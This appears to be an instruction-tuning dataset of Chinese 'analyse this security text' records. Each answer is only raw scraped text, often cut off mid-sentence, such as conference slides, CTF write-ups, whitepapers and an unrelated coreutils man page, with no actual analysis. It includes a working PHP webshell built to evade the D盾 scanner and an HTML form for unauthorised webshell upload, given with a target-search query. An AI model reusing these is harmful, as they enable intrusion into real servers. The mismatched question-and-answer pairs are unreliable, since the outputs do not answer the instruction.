{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n利用$_COOKIE写过D盾马php 7.x + 菜刀很配哦 oxo1 前言 之前就在土司发过一篇利用 $_COOKIE 过D盾的文章同时利用setcookie的写法投稿过圈子发现 D盾 好像对 $_COOKIE 不怎么敏感完全可以利用来过D盾之前一直在想菜刀要怎么连接 php 7.x 的 webshell修改下 caidao.conf 就可以连接了这次主要的目的是菜刀连接php 7.x 的webshell... oxo2 编写 1修改菜刀方便连接 php 7.x 2编写Webshell 之前发在土司的webshell 已经被扫出级别为1 <?php @$a = $_COOKIE[1]; $b = ''; $c = ''; @assert($b.$a); ?> 要自己写一个COOKIE太不方便了不是我想要的下面利用 setcookie 来实现不用手动添加COOKIE 利用 setcookie 定义一个Cookie 成果之前投稿过圈子当时使用的函数是assert 理所当然被查出等级1了 成功过D盾 3不足的地方 第一次运行的时候是不带Cookie的 <?php setcookie(1,@$_POST[1]); @eval(''.''.$_COOKIE[1]); 需要重新刷新一下 4菜刀连接 新建连接 第一次运行没有Cookie 再次运行就好了已经写入Cookie oxo3 文末 $_COOKIE 应该可以搭配很多方法因为 D 盾对他不太敏感", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH NPROC 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 nproc \\- 显示可用的处理器单元个数 .SH 概述 \\fBnproc\\fP [\\fI\\,选项\\/\\fP]... .SH 描述 .\\\" Add any additional description here .PP 打印当前进程可用的处理器数此数目可能小于实际在线的处理器数量 .TP \\fB\\-\\-all\\fP 打印已安装的处理器数目 .TP \\fB\\-\\-ignore\\fP=\\fI\\,N\\/\\fP 可能的话排除 N 个处理单元 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Giuseppe Scrivano 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/nproc> .br 或者在本地使用 info \\(aq(coreutils) nproc invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSee no evil, hear no evil Hacking invisibly and silently with light and sound www.pwc.co.uk July 2017 Matt Wixey  PwC UK PwC Intro  Matt Wixey  Lead the research function on PwCs UK pentesting team  Run The Dark Art Lab research blog  Previously worked in LEA, leading R&D team PwC Agenda  Part I: Jumping air-gaps  Part II: Surveillance and counter-surveillance  Part III: Bantz  Part IV: Summary and future research PwC Disclaimers  The views and opinions expressed in this talk are not necessarily those of PwC  All content is for educational purposes only. Read up on relevant laws, only attack systems you own or have permission to attack!  What this presentation isnt  I am in no way an electronics expert PwC Dunning-Kruger Curve Me Mt. Stupid PwC Key terms  Modulation  Ultrasonic  Near-ultrasonic  Spectrogram  Infrared PwC PwC PwC Part I Jumping air-gaps  A Sensor Darkly  Dreadphone  Spectregram PwC Caveats  Virtually all research in this area assumes that the attacker has already managed to infect at least one host  Attacker has physical or near-physical access  Exfiltration is of small pieces of data PwC Previous research  Van Eck phreaking  e.g. Kuhn (2003); Halevi and Saxena (2012)  AirHopper (Guri et al 2014)  radio frequencies  BitWhisper (Guri et al 2015)  heat  VisiSploit (Guri et al 2016)  codes & camera  Fansmitter (Guri et al 2016)  acoustic  SPEAKE(a)R (Guri et al 2016)  speakers to mics  xLED (Guri et al 2017)  Hasan et al (2013)  great overview of techniques  Including ALS for mobile devices  Lots more! PwC ALS  Ambient Light Sensor  Increasingly common  Laptops  Monitors  Smartphones  Tablets  Smartwatches PwC Design  The plan:  Create malware to read light (lux) values from the ALS through the API  Malware executes different commands according to changes in the intensity  Problems:  Hurr durr, Ill just shine this massive torch onto my laptop to execute commands  Need exfil capability PwC Demo PwC Exfiltration PwC Exfiltration PwC Results PwC Prototype ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### CTF中SQL 注入类题目概述 通过在用户可控参数中注入 SQL 语法破坏原有 SQL 结构达到编写程序时意料之外结果的攻击行为其成因可以归结为以下两个原因叠加造成的 1. 程序编写者在处理应用程序和数据库交互时使用字符串拼接的方式构造 SQL 语句 2. 未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中 ### CTF中XSS 跨站脚本攻击类题目概述 跨站脚本攻击Cross Site Scripting为不和层叠样式表Cascading Style SheetsCSS的缩写混淆故将跨站脚本攻击缩写为 XSS恶意攻击者往 WEB 页面里插入恶意 HTML 代码当用户浏览该页之时嵌入其中 Web 里面的 HTML 代码会被执行从而达到恶意攻击用户的特殊目的 ### CTF中命令执行类题目概述 当应用需要调用一些外部程序去处理内容的情况下就会用到一些执行系统命令的函数如 PHP 中的 `system``exec``shell_exec` 等当用户可以控制命令执行函数中的参数时将可以注入恶意系统命令到正常命令中造成命令执行攻击这里还是主要以 PHP 为主介绍命令执行漏洞Java 等应用的细节待补充 ### CTF中文件包含类题目概述 如果允许客户端用户输入控制动态包含在服务器端的文件会导致恶意代码的执行及敏感信息泄露主要包括本地文件包含和远程文件包含两种形式 ### CTF中CSRF 跨站请求伪造类题目概述 跨站请求伪造Cross-Site Request ForgeryCSRF是一种使已登录用户在不知情的情况下执行某种动作的攻击因为攻击者看不到伪造请求的响应结果所以 CSRF 攻击主要用来执行动作而非窃取用户数据当受害者是一个普通用户时CSRF 可以实现在其不知情的情况下转移用户资金发送邮件等操作但是如果受害者是一个具有管理员权限的用户时 CSRF 则可能威胁到整个 WEB 系统的安全 ### CTF中SSRF 服务器端请求伪造类题目概述 SSRFServer-Side Request Forgery服务器端请求伪造是一种由攻击者构造形成由服务端发起请求的一个安全漏洞一般情况下SSRF 攻击的目标是从外网无法访问的内部系统 ### CTF中文件上传类题目概述 在网站的运营过程中不可避免地要对网站的某些页面或者内容进行更新这时便需要使用到网站的文件上传的功能如果不对被上传的文件进行限制或者限制被绕过该功能便有可能会被利用于上传可执行文件脚本到服务器上进而进一步导致服务器沦陷 ### CTF中点击劫持类题目概述 Clickjacking点击劫持是由互联网安全专家罗伯特汉森和耶利米格劳斯曼在 2008 年首创的 是一种视觉欺骗手段在 WEB 端就是 iframe 嵌套一个透明不可见的页面让用户在不知情的情况下点击攻击者想要欺骗用户点击的位置 由于点击劫持的出现便出现了反 frame 嵌套的方式因为点击劫持需要 iframe 嵌套页面来攻击 下面代码是最常见的防止 frame 嵌套的例子 ```js if(top.location!=location) top.location=self.location; ``` ### CTF中VPS 虚拟专用服务器类题目概述 VPSVirtual Private Server 虚拟专用服务器技术将一部服务器分割成多个虚拟专享服务器的优质服务实现 VPS 的技术分为容器技术和虚拟化技术在容器或虚拟机中每个 VPS 都可分配独立公网 IP 地址独立操作系统实现不同 VPS 间磁盘空间内存CPU 资源进程和系统配置的隔离为用户和应用程序模拟出独占使用计算资源的体验VPS 可以像独立服务器一样重装操作系统安装程序单独重启服务器VPS 为使用者提供了管理配置的自由可用于企业虚拟化也可以用于 IDC 资源租用 IDC 资源租用由 VPS 提供商提供不同 VPS 提供商所使用的硬件 VPS 软件的差异及销售策略的不同VPS 的使用体验也有较大差异尤其是 VPS 提供商超卖导致实体服务器超负荷时VPS 性能将受到极大影响相对来说容器技术比虚拟机技术硬件使用效率更高更易于超卖所以一般来说容器 VPS 的价格都低于虚拟机 VPS 的价格 ### CTF中条件竞争类题目概述 条件竞争漏洞是一种服务器端的漏洞由于服务器端在处理不同用户的请求时是并发进行的因此如果并发处理不当或相关操作逻辑顺序设计的不合理时将会导致此类问题的发生 ### CTF中XXE类题目概述 XXE Injection 即 XML External Entity Injection也就是 XML 外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发的安全问题 在 XML 1.0 标准里XML 文档结构里定义了实体en", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wireshark twoo twooo two twoo... Category: Forensics, 100 points ## Description > Can you find the flag? A network capture was attached. ## Solution We get a network capture with mainly HTTP and DNS traffic: ```console (user@kali)-[/media/sf_CTFs/pico/Wireshark_twoo_twooo_two_twoo] $ tshark -qz io,phs -r shark2.pcapng =================================================================== Protocol Hierarchy Statistics Filter: eth frames:4831 bytes:3355920 ip frames:4829 bytes:3355822 tcp frames:3276 bytes:3120750 tls frames:71 bytes:115780 tcp.segments frames:2 bytes:6576 http frames:802 bytes:1879844 tcp.segments frames:299 bytes:1605841 mime_multipart frames:309 bytes:194144 tcp.segments frames:309 bytes:194144 data-text-lines frames:91 bytes:23987 tcp.segments frames:90 bytes:23696 xml frames:1 bytes:579 udp frames:1553 bytes:235072 gquic frames:41 bytes:11668 dns frames:1512 bytes:223404 arp frames:2 bytes:98 =================================================================== ``` Scanning through the streams, we see this: ```console (user@kali)-[/media/sf_CTFs/pico/Wireshark_twoo_twooo_two_twoo] $ tshark -r shark2.pcapng -qz follow,tcp,ascii,5 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 5 Node 0: 192.168.38.104:63636 Node 1: 18.217.1.57:80 445 GET / HTTP/1.1 Host: 18.217.1.57 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 17 HTTP/1.0 200 OK 235 Content-Type: text/html; charset=utf-8 Content-Length: 99 Server: Werkzeug/1.0.1 Python/3.6.9 Date: Mon, 10 Aug 2020 01:39:16 GMT The official Red's Shrimp and Herring website is still under construction. Please c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSystem.Web.UI.Control.OpenFile System.Web.UI.WebControls.MailDefinition.CreateMailMessage System.Web.UI.WebControls.LoginUtil.CreateMailMessage System.Web.UI.WebControls.LoginUtil.SendPasswordMail  ChangePassword.PerformSuccessAction  CreateUserWizard.AttemptCreateUser  PasswordRecovery.AttemptSendPasswordQuestionView  PasswordRecovery.AttemptSendPasswordUserNameView   Client [Remote] InvokeStaticMethod Method_proxy [ClientCallable]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOffensive Golang Bonanza Writing Golang Malware Ben Kurtz @symbolcrash1 awgh@awgh.org Introductions First Defcon talk 16 years ago Host of the Hack the Planet podcast All kinds of random projects Enough about me, weve gotta hustle What Were Doing Easy Mode: Listen along and youll get a sense of the available Golang malware components Expert Mode: Follow the links to code samples, interviews, and all kinds of other stuff; learn how to make/detect Golang malware Agenda Binject Origin & Why Golang is cool Malware Core Components Exploitation Tools EDR & NIDS Evasion Tools Post-exploitation Tools Complete C2 Frameworks Long, long ago I got interested in anti-censorship around an Iranian election, took a look at Tors obfsproxy2 and thought I could do better Started the Ratnet project*, decided to use that as an excuse to learn Golang *this comes up later Golang is Magic Everything you need comes in the stdlib Crypto, Networking, FFI, Serialization, VFS Or is built into the compiler||runtime Cross-compiler, Tests, Asm, Threads, GC 3rd Party library support is unparalleled Rust is years away, but what we did is a guide Golang is Magic Main Reason I love Go: Its the fastest way to be done Fastest way to learn Go: golang.org/doc/effective_go Go Facts Not interpreted, statically compiled ~800k Runtime compiled in Embedded assembly language based on Plan9s assembler, lets you do arbitrary low-level stuff without having to use CGO or set up external toolchains. Go Assembly Write-up: https://www.symbolcrash.com/2021/03/02/go- assembly-on-the-arm64/ So Stuxnet Happened Everyone gets hot on environmental keying Josh Pitts does Ebowla in Golang All the EDRs write sigs for Ebowla *cough* the Golang runtime (shared by all Golang progs) And then this happens Docker Terraform py2exe/jar2exe returns EDRs cant figure out how to sig Go very well since its statically compiled, and cant sig the runtime And we already have this sweet exfiltration thing (Ratnet) Start meeting up with other se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n某厅后台未授权上传 <html><head> <meta charset=\"utf-8\"> <title>.net版本活动厅通杀本地上传webshell脚本</title></head><body> <form action=\"https://标域名/后台后 缀/UpLoad/Savelmagesmethd=\"postenctype=multipart/form-data\"> <label for=\"file\">件名:</label> <input type=\"file\" name=\"Filedata\" id=\"Filedata\"> <br><input type=\"submit\" name=\"submit\" value=\"提交\"></form> </body></html> 说明 fofa 语法:\"/Home/QueryApply/?activityld=\" 获取后台地址:域名/+user/就动跳转对应域名 填地址打开上传脚本选取MM件上传返回成功地址秒shell 影响因素:宝塔安全狗或者部分限制不解析更改件后缀等***绕过 打击赌犯罪替天道", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n软 件 供 应 链 安 全 技 术 白 皮 书 透 视 软 件 供 应 链  携 手 应 对 安 全 挑 战 透视软件供应链携手应对安全挑战 软件供应链安全 技术白皮书 软件供应链安全技术白皮书 2 关于绿盟科技 绿盟科技集团股份有限公司以下简称绿盟科技成立于 2000 年 4 月总部位于北京公司于 2014 年 1 月 29 日在深圳证券交易所 创业板上市证券代码300369绿盟科技在国内设有 50 余个分支机构 为政府金融运营商能源交通科教文卫等行业用户与各类型企 业用户提供全线网络安全产品全方位安全解决方案和体系化安全运 营服务公司在美国硅谷日本东京英国伦敦新加坡及巴西圣保罗 设立海外子公司和办事处深入开展全球业务打造全球网络安全行业 的中国品牌 中国网络空间新兴技术安全创新论坛 简称新安盟 CCSIA 在中国产学研合作促进会的指导下成立由中国工程院方滨兴院士担任 理事长中国科学院信息工程研究所作为秘书长单位主要任务是应对 新兴技术及其应用给网络空间安全带来的机遇和挑战汇聚行业内各方 力量推动核心技术突破产品和服务创新 版权声明 为避免合作伙伴及客户数据泄露 , 所有数据在进行分析前都已经 过匿名化处理 , 不会在中间环节出现泄露 , 任何与客户有关的具体信息 均不会出现在本报告中 推荐序 软件供应链安全作为现代供应链安全的重点考虑因素之一是保障我国新基建稳步 建设和落实网络强国战略的重要领域软件供应链安全需要重点关注以下两点 一是要靶向聚焦着力剖析供应链风险产生的内部动因和运行机理近年来供应 链安全事件频发随着 SDX 和低代码等技术在数字化转型浪潮的广泛应用软件开源 组件化将成为势在必行的技术演进方向而由于其本身的软件生产机制特征网络安全 风险的攻击面及风险环节会呈现发散和无规则逻辑状态因此供应链风险的内部动因和 运行机理尤其是业务数字化的内涵值得网安领域重点关注 二是勿管中窥豹从广义供应链安全的观测视角提出软件供应链风险对策以供应 链所在行业为中心视角研究软件供应链安全问题是一种挑战行业发展对象将愈发依赖 于数字化转型原有的安全业务和业务安全范式都将被重塑因而以数字业务化作为 观测出发点以广义供应链安全作为观测着力点以软件供应链安全作为观测落脚点 各行各业对网络安全产业的保驾护航定位将会更加明确 作为业界领先的网安代表性企业在新安盟指导下绿盟主持撰写的软件供应链安 全白皮书将带来一个崭新的全景视角具有积极的借鉴价值为网安行业的政产学研用 健康生态如何推动提供有意义的模式示范 中国科学院大学教授 翟立东 CONTENTS 执行摘要 001 1ﾠ软件供应链安全威胁与趋势 003 1.1 软件供应链面临的安全威胁 004 1.2 软件供应链攻击的发展趋势 007 2ﾠ供应链安全国内外形势 010 2.1 国内外供应链安全政策与发展 011 2.2 国内外供应链安全标准与实践 015 3ﾠ软件供应链安全技术框架 019 3.1 软件供应链安全 020 3.2 软件供应链安全理念 021 3.3 软件供应链安全技术框架 027 4ﾠ软件供应链安全关键技术 028 4.1 软件成分清单生成及使用技术 029 4.2 软件供应链安全检测技术 039 4.3 软件供应链数据安全技术 054 5ﾠ软件供应链安全解决方案 058 5.1 供应链安全监督 059 5.2 供应链安全管控 067 6ﾠ行业企业最佳实践 080 6.1 银行业金融机构信息科技外包安全实践 081 6.2 交通运输企业供应链安全监督检查实践 082 7ﾠ典型供应链攻击案例复盘 085 7.1 IT 管理供应商 SolarWinds 供应链攻击事件 086 7.2 开源软件安全风险 Log4j2 漏洞事件 088 8ﾠ软件供应链安全总结与展望 091 附表软件供应链安全风险表 093 软件供应链安全技术白皮书 001 执行摘要 习近平总书记在二十国集团领导人第十六次峰会第一阶段会议发表的重要讲话中强调 要维护产业链供应链安全稳定畅通世界经济运行脉络 作为世界第二大经济体我国在世界局势不断变化的今天依靠自身供应链韧性保持了强 有力的经济增长与制造业产业转型升级持续稳步推进信息和通信技术Information and Communications Technology简称 ICT供应商第三方供应商集成服务企业和服务提 供商共同组成的 ICT 产业链承担着我国产业从工业化向数字化转型升级的重要任务2018 年 以来中兴华为大疆等一系列事件暴露出我国 ICT 产业链上游核心技术受制于人的问题 缺乏核心技术使我国网络安全与信息化建设存在巨大的风险与阻碍尤其在近期俄乌冲突期 间西方社会对俄罗斯进行了全方位的制裁同时将 ICT 供应链制裁上升到了战略层面对俄 罗斯进行打击这一", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Time's Up, Again! Reverse Engineering, 450 points ## Description: > Previously you solved things fast. Now you've got to go faster. Much faster. Can you solve *this one* before time runs out? ## Solution: This is the follow-up for [Time's Up](Times_Up.md). Let's run the attached file: ```console root@kali:/media/sf_CTFs/pico/Times_Up_Again# ./times-up-again Challenge: (((((1735039958) * (-243100254)) * ((-1814728608) + (-721614403))) - (((25798291) + (1566207868)) - ((1371345736) - (328354048)))) + ((((-574011032) - (-976943047)) + ((1078373531) + (-764373806))) * ((((151190841) - (-1982829483)) - ((-1990831043) - (440995030))) - (((-1753759716) + (-1201408286)) * ((656319610) * (143280253)))))) Setting alarm... Solution? Alarm clock ``` We got a mathematical expression, and shortly after, the program got killed by an alarm. How long is the alarm? Let's use `strace` to see: ```console root@kali:/media/sf_CTFs/pico/Times_Up_Again# strace ./times-up-again 2>&1 | grep setitimer setitimer(ITIMER_REAL, {it_interval={tv_sec=0, tv_usec=0}, it_value={tv_sec=0, tv_usec=200}}, {it_interval={tv_sec=0, tv_usec=0}, it_value={tv_sec=0, tv_usec=0}}) = 0 ``` We can see that the alarm is set for 200 uSeconds - much sorter than the last time. In this time, we must evaluate the equation and input the answer back to the program. We won't have time to call `bc` to evaluate the expression this time, we'll have to choose a faster approach: A `C` program. The standard approach for communicating with a program's `stdin` and `stdout` in `C` is via pipes: We implement a wrapping program which `fork`s itself - the child then executes the program we want to communicate with and the parent is able to read the child's `stdout` and write to its `stdin`. I used a template based on [this article](https://jameshfisher.com/2017/02/17/how-do-i-call-a-program-in-c-with-pipes/) to setup the pipes which are used for communication. [This StackOverflow Answer](https://stackoverflow.com/questions/9329406/e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPrivacy in DSRC connected vehicles Defcon 21  August 3, 2013 whoami  BSEE, digital communications  Many years as a network engineer  Santa Clara University Law student  Research assistant providing technical expertise on privacy audits and reviews  Contracted by auto consortium to review privacy of proposed vehicle to vehicle safety network Standard Disclaimer IANAL (Yet) Non-Standard Disclaimer A current NDA covers some of my work here (but not very much) The focus will be on published information and standards. What is This Project?  DSRC: Dedicated Short Range Communications  (Where short == 380m)  Multi-channel protocol (only considering safety channel operation)  Vehicle to Vehicle  Vehicle to infrastructure - Not having to wait for a light on an empty street again. Will it Maintain Privacy?  Probably not, but it could  Developed for functionality  Few, small, general privacy and security reviews  More PR on giving up privacy Why is It being Developed?  Safety Photo: Jason Edward Scott Bain How the safety features work Photo: US Dept. of Transportation Non-trivial Impact on Auto Deaths  World Health Organization estimates 25% of vehicle deaths each year can be prevented.  Fatigue and distracted driving accidents reduced.  Blind Corners, fog and limited visibility accidents reduced. Photo: Public Domain Will This really Happen? IT ALREADY IS How Soon?  Large Scale function tests complete  Hardware is already being shipped.  National Transportation Safety Board said to mandate this last week.  Has already deployed in trucks in Europe What is DSRC  Basic safety messages sent out every 1/10 seconds.  All message carry a standard glob: values for pre-defined vehicle trajectory and operational data.  Cars process data and warn driver.  Equipment integrated into vehicle Photo: US Dept. of Transportation AfterMarket Installation  A little cumbersome Photo: NIST What DSRC is not  CANbus  OnStar (or any other remote service)  (Direct) support for autonomous driving mechan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 从外部网络获取域管理员权限 #### 简介 本文讲解一种域渗透测试方案该方案的背景是你已经拥有了对具有一个或多个域网络的内部访问权限但我们的目标是获取域管理员权限 在某些测试活动中我们通常拥有某种级别的内部网络访问权限但这并不意味着你可以跳过之前的这些部分虽然互联网上有一些工具可能会帮助你进行域名管理但在此我将介绍一种手动方式查找获取DA权限所需信息的方法 ### 操作步骤 一般而言从外部网络取得域管理权限包括许多步骤 在真实的域渗透中情况通常比较复杂需要你采用多种方式进行测试不会都像本文概述的线性方式去实现但是本文阐述的这些步骤应该可以帮助你构建其域渗透测试的方案 ## 枚举外部网络 **目标:发现目标机器或者服务** 你一般处在外部网络上也就是通常意义上的Internet并且选定了一个目标如果目标是实验室环境则已有一组IP地址可用我们的第一步是要枚举一组IP或子网一旦发现一个或多个目标机器和服务就应该彻底地调查它们 **技术** * 端口扫描 * 调查暴露的服务 **值得关注的事情** * IIS \\(80, 443\\) * RDP \\(3389\\) * MSSQL \\(1433\\) * RDS \\(3389\\) * RDWEB \\(3389, navigate to [http://ip/rdweb](http://ip/rdweb)\\) * OWA \\(80, navigate to subdomain email.domain.com or http://ip/owa\\) **工具** * Nmap * Firefox ## 获取域用户凭据 **目标: 获取域用户凭据** 这里的域用户可以是域中的任何用户我们首先要做的是找出域名获得域名后我们就可以尝试一种称为密码喷洒(Password Spraying)的攻击技术大多数企业都会提供多种身份验证方式常见的比如Outlook的Web控制SMB等这就意味着如果我们能够找出域账户名称的构成语法我们就可以尝试使用通用密码进行身份验证但是在进行密码喷洒攻击时要注意锁定阈值因为许多企业的安全策略都会设定五次尝试后锁定账户 **方法** * 找出域名 * 弄清楚域账户名的构成语法规则 * 获取一个域用户的账户名 * 获取一个域用户的密码 * **技术** * 公开资源情报计划(OSINT) * 调查公开服务的内容 * 对OWA(Outlook Web Access)进行密码喷洒攻击 * 验证凭证的其他方法 \\(RDP\\) **Tools** * OSINT * Burp Intruder * Mailsniper ### 获取一个内部网络中的shell **目标: 获取内部网络一台机器的shell** 此处的目标是在内网的某台主机或者服务上执行你的攻击载荷使得目标可以主动回连到你的主机也即在内网中获取一台机器的shell 就像在2003年是黑客攻击使用的方法一样最有效的就是你针对外部开放服务的某个漏洞进行攻击比如wordpressSharepoint中的RCE或某处的SQL注入都是可以的当然如果你没有发现某个漏洞的存在或者感觉无从下手的时候一些工具可以帮助你进行攻击现有服务比如:Ruler如果以上方式都行不通那么可以使用最后一种方式--钓鱼攻击这种方式可能会帮助你获取某个系统的命令执行权限但是这种也是一种比较容易被发现的攻击方式 **技术** * Abusing外部开放服务 * 漏洞利用 * 钓鱼攻击 **Tools** * Ruler * Phishing with HTA payload * Metasploit ### 命令行与控制器 \\(C2\\) **目标: 建立一个到内部网络的通信系统** 通过SQL注入获得的shell通道可能并不稳定不适合进一步工作所以我们需要建立一个更好的通道来与系统进行交互此处就是C2的用武之地它的环境配置十分简单无论你在家里的计算机还是使用AWS box都可以迅速配置 **技术** * 搭建一台C2服务器 * 打开服务器上的一个端口并设置为监听模式 * 从domain进行回连 * 建立持久性连接 **工具** * Empire * dnscat2 * Empire persistence modules ## 枚举内部网络 **目标: 查找内部网络中计算机上的漏洞** **方法** 枚举域之前我们要先获取一名域用户的shell并且建立一个和内部网络的稳定交互通信方式 在此处使用商业化的漏洞扫描程序可以帮助我们尽可能多地发现切入点 如果没有商业化的漏洞扫描工具那么免费的nmap也是一个不错选择但是在大型网络中扫描记得保持条理因为扫描的输出信息还是很多的 在域中最值得我们去发现的就是域控制器了一般的大型域中会有好几个域控制器的存在 此外我们还应当", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n编号APP-YJBG-2019-001 App 申请安卓系统权限机制 分析与建议 V1.0 版 App 专项治理工作组 2019-05 目 录 一前言............................................................ 1 二安卓系统简介.................................................... 2 三安卓系统权限分类................................................ 3 四收集使用个人信息相关权限........................................ 6 五百款 App 权限申请情况对比分析.................................... 9 6.1 申请权限数量统计分析........................................ 9 6.2 申请权限占比统计分析....................................... 10 6.3 强制申请权限数量统计分析............................... 12 6.4 强制申请权限占比统计分析............................... 14 六安卓系统权限使用建议........................................... 16 声 明 本文部分内容来源于互联网公开资料以及专家观点如对本文 内容有相关建议可发送邮件至 pip-03@tc260.org.cn 向 App 专项 治理工作组反馈 本报告仅供相关组织和研究人员参考如转载或引用该报告观 点数据请注明来源 第 1 页 一 前言 随着智能手机功能的日益强大用户在手机上产生的 个人信息越来越多其中很多个人信息是依托手机操作系 统的权限机制产生的在一次网民隐私侵犯类型认知调查 中受访网民认为手机的移动互联网应用程序(以下简称 App)读取通话记录读取通讯录读取短信和获取位 置信息等系统权限属于隐私范畴2018 年中消协发布 的100 款 App 个人信息收集与隐私政策测评报告中显 示位置通讯录电话等权限存在被广泛申请并有过度 使用的嫌疑App 专项治理工作组自 3 月 1 日开通App 个 人信息举报微信公众号以来收到大量关于 App 申请系 统权限相关的举报包括以强制一揽子等方式索要权 限以及过度频繁等形式索要业务功能非必要权限由 此可见规范 App 申请收集使用个人信息相关权限对于 加强 App 个人信息保护具有重要意义 App 专项治理工作组从主流安卓应用商店选取了 100 款 下载量大民众熟知和常用的 App对其申请安卓 Android系统权限的情况进行了分析并整理形成了 百款常用 App 申请收集使用个人信息权限列表附 后 第 2 页 二 安卓系统简介 Android 操作系统是一种多用户 Linux 权限分隔的操 作系统每个 App 都是一个不同的用户,当 App 安装到 Android 设备后App 将运行在其独立的安全沙箱内有其 独立的 Linux 进程 Android 版 App 在默认情况下不拥有任何系统权限,不 会执行任何对其他应用操作系统或用户有不利影响的操 作包括读取或修改用户的私有数据例如通讯录或电子 邮件读取或写入其他应用程序的文件执行网络访 问使设备保持唤醒状态等 如果 App 因业务功能需要申请系统权限通常情况 下App 开发者可通过在 AndroidManifest.xml 配置文件中 明确声明的方式静态方式以及在代码运行阶段请求 的方式动态方式申请系统权限 第 3 页 三 安卓系统权限分类 App 在系统中所有预定义的权限根据作用的不同分别 属于不同的级别安卓系统权限级别分为如下四类包括 普通级别(Normal)危险级别(Dangerous)签名级别 (Signature)及系统/签名级别(Signature or System)但 根据手机终端的系统版本和 App 的目标 SDK 等有不同的表 现方式各类权限简介如下 1普通级别(Normal) 普通级别的权限通常不会对用户隐私或设备操作造 成风险App 只要申请了就可以使用在 AndroidManifest.xml 中添加<uses-permission>标签 安装时不需要用户确认系统会自动授予用户可以在 App 安装文件中看到这些权限但无法进行管理例如设置时 区的权限就是普通级别权限 2危险级别(Dangerous) 危险级别的权限也称为敏感权限该类权限涉及用 户的隐私信息或相关资源或者可能对用户存储的数 据或其他应用的操作产生影响危险权限不", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Living Off the Walled Garden: Abusing the Features of the Early Launch Antimalware Ecosystem Matt Graeber Director, Threat Research @ Red Canary #BHUSA @BlackHatEvents Information Classification: General Who protects the protector? Introduction to ELAM and PPL #BHUSA @BlackHatEvents Information Classification: General Previous work - Everything is derivative Thank you James and Alex! #BHUSA @BlackHatEvents Information Classification: General Protected Process Light Protections  Designed to prevent tampering in user-mode, even as admin.  Cannot start or stop protected processes  Cannot get a handle to a protected process  Cannot attach a debugger to a protected process  To run protected, an executable must meet specific signing requirements. #BHUSA @BlackHatEvents Information Classification: General Early Launch AntiMalware (ELAM) Drivers  Microsofts supported 3rd party security product anti-tampering mechanism.  Specifies certificate hashes allowed to run at the Antimalware- Light PPL protection level  Microsoft requires that Early Launch Antimalware vendors be members of the Microsoft Virus Initiative (MVI).  Vendors must pass the WHQL driver submission. #BHUSA @BlackHatEvents Information Classification: General Enumerating installed ELAM drivers #BHUSA @BlackHatEvents Information Classification: General Early Launch Antimalware (ELAM) Driver Hashes  Certificate hashes are To-Be-Signed (TBS) hashes.  TBS hash is not the same as a Thumbprint!  Tools to calculate TBS hash:  certmgr.exe (Windows SDK)  Get-TBSHash  VirusTotal doesnt understand TBS hashes #BHUSA @BlackHatEvents Information Classification: General ELAM Driver Signer Resource MicrosoftElamCertificateInfo MSElamCertInfoID { 3, // count of entries LCertHash1\\0, Algorithm, LEKU1\\0, LCertHash2\\0, Algorithm, L\\0, //No EKU for cert hash 2 LCertHash3\\0, Algorithm, LEKU3a;EKU3b;EKU3c\\0, //multiple EKU entries supported (max: 3) } Protecting anti-malware services #BHUSA @BlackHatEvents Infor", "category": "text_analysis", "source": "security_papers"}
